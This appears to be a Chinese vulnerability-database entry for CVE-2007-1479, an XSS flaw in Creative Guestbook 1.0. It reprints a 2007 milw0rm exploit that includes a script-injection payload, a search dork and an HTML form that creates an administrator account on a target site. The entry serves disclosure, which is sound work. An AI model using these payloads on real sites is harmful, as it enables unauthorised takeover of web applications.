Creative Guestbook Guestbook.php 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112453 漏洞类型 跨站脚本
发布时间 2007-03-15 更新时间 2007-03-16
CVE编号 CVE-2007-1479 CNNVD-ID CNNVD-200703-390
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/3489
https://www.securityfocus.com/bid/81871
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-390
|漏洞详情
CreativeGuestbook1.0版本的Guestbook.php中存在跨站脚本攻击漏洞。远程攻击者可以借助未明参数,注入任意的web脚本或HTML。
|漏洞EXP
.-""""""""-.                                 
                                                         /   Dj7xpl   \                              
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  \o_)( |                                     
                                                        |/     /\     \|                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) \_______\__|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
#
#
#   Portal     :   Creative Guestbook 1.0
#   Download   :   http://www.thecreativeheads.de/CreativeFiles/downloads.php
#   Author     :   Dj7xpl  | Dj7xpl@yahoo.com
#   Dork       :   "Creative Guestbook"
#   Class      :   (Add Remote Admin User)   And   (Cross Site Scripting)
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#   css/xss :
#              http://[Target]/[Path]/Guestbook.php   <== Insert Yor Script
#              Example : <script> alert ('  dj7xpl ^_^  ') </script>
#
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#   Add Remote Admin User :
#	
#	<form name="admin" method="post" action="http://[target]/[path]/createadmin.php?PHPSESSID='.session_id().'">
#       <input type="text" name="Name" value="name"><br>
#       <input type="text" name="Email"value="email"><br>
#       <input type="text" name="PASSWORD" value="password"><br>
#       <input type="submit" value="Admin hinzufügen" name="submit">
#   </form>
#	
#	
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#    Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh .............
#
#
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-03-15]
|受影响的产品
Creative Guestbook Creative Guestbook 1.0
|参考资料

来源:MILW0RM
名称:3489
链接:http://www.milw0rm.com/exploits/3489
来源:OSVDB
名称:34233
链接:http://osvdb.org/34233
来源:XF
名称:creative-schreiben-xss(33015)
链接:http://xforce.iss.net/xforce/xfdb/33015
来源:SECUNIA
名称:24536
链接:http://secunia.com/advisories/24536